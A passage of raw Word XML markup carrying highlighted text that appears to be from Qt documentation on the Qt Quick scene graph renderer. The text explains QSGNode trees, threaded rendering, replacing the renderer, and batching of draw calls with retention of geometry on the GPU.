          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to get good performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, it might help when</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrating with the scene graph or to figure out why it is not possible to squeeze the maximum efficiency out of the graphics chip</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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5420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Even in the case where every frame is unique and everything is </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uploaded from scratch</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the default renderer will perform well.</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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick items</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML scene</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> populates a </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tree of</w:t>
      </w:r>
      <w:r w:rsidR="005420D5" w:rsidRPr="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2045" w:history="1">
        <w:r w:rsidRPr="005420D5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005420D5" w:rsidRPr="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Once created, this </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tree is a complete description of </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>how a certain frame should be rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It does </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not contain any references back to the Qt Quick items at all</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will on most platforms be </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>processed and rendered in a separate thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renderer is a self contained part of the scene graph which traverses the</w:t>
      </w:r>
      <w:r w:rsidR="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2046" w:history="1">
        <w:r w:rsidRPr="005420D5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>geometry defined in</w:t>
      </w:r>
      <w:r w:rsidR="005420D5" w:rsidRPr="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2047" w:history="1">
        <w:r w:rsidRPr="002352BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader state defined in</w:t>
      </w:r>
      <w:r w:rsidR="005420D5" w:rsidRPr="002352BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2048" w:history="1">
        <w:r w:rsidRPr="002352BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005420D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="005420D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>schedule OpenGL state change and draw calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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If needed, the renderer </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be completely replaced using the internal scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>back-end API</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is mostly </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interesting for platform vendors</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> who wish to take advantage of non-standard hardware features. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For majority of use cases, the default renderer will be sufficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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The default renderer </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focuses on two primary strategies to optimize the rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batching of draw calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>retention of geometry on the GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="002352BA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1676" w:name="batching"/>
      <w:bookmarkStart w:id="1677" w:name="_Toc483000894"/>
      <w:bookmarkStart w:id="1678" w:name="_Toc483003885"/>
      <w:bookmarkStart w:id="1679" w:name="_Toc483604238"/>
      <w:bookmarkStart w:id="1680" w:name="_Toc483605458"/>
      <w:bookmarkEnd w:id="1676"/>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batching</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1677"/>
      <w:bookmarkEnd w:id="1678"/>
      <w:bookmarkEnd w:id="1679"/>
      <w:bookmarkEnd w:id="1680"/>
    </w:p>
    <w:p w:rsidR="002352BA" w:rsidRPr="00F44A62" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Where a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>traditional</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2D API, such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2049" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QPainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Cairo or</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2050" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Context2D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, is written </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to handle thousands of individual draw calls per frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pure </w:t>
      </w:r>
      <w:r w:rsidRPr="002352BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hardware API</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>performs best when the number of draw calls is very low</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state changes are kept to a minimum</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00E6674F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use case</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44A62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F44A62">
